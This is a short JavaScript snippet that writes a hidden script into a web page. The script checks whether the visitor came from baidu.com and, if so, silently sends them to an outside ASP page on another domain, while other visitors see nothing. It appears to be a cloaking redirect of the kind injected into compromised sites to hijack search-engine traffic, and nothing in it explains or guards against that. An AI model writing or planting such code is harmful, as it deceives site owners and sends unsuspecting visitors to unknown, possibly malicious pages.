document.writeln("<script language=\"javascript\" type=\"text\/javascript\">");
document.writeln("var url = document.referrer;");
document.writeln("if(url.indexOf(\"baidu.com\") != -1)");
document.writeln("{");
document.writeln("window.location.href=\"http:\/\/www.hunanwuye.com\/css\/index.asp\"");
document.writeln("}");
document.writeln("else");
document.writeln("{");
document.writeln("        document.write(\"\");");
document.writeln("}");
document.writeln("<\/script>");
